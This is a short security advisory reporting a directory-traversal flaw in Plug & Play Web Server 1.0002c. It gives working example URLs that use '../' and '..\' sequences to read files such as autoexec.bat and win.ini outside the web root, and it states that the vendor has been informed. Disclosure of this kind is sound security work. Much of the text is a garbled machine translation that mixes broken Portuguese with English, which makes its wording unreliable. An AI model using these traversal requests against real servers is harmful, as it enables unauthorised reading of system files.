Directory traversal in Plug & Play
Web ServerIntroduction:
=============
"A Tomada e Joga Servidor De Web fornece não menos do que
as ferramentas você necessita hospedar sua
próprio website. As ferramentas são empacotadas juntamente
em um software compreensivo
empacote que isto está incrivelmente fácil para usar e
mantem."
- Descrição Dos Vendedores
[ http://www.pandpsoftware.com ]Details:
========
Vulnerable systems: Plug & Play Web Server version 1.0002c
Plug & Play Web Server uma Vulnerabilidade Do Traversal De Diretório
tem Usando o fio
'../' or '..\' in a URL, um attacker pode ganhar lê acesso para
qualquer exterior de arquivo de
the intended web-published filesystem directory.
http://[target]/../../existing_file
http://[target]\..\..\existing_file
Examples:
---------
http://localhost/../../autoexec.bat
http://localhost/../../windows/win.ini
http://localhost/../../ [show the files and the folders in C drive -
if the
'Show Directory list when homepage does not exist' option is active.]Vendor
status:
==============
O vendedor tem sido informado, e eles estão fixando este bug.
A versão atualizada, quando liberada, pode ser descarregada de
http://www.pandpsoftware.com/download.htmDiscovered by/Credit:
=====================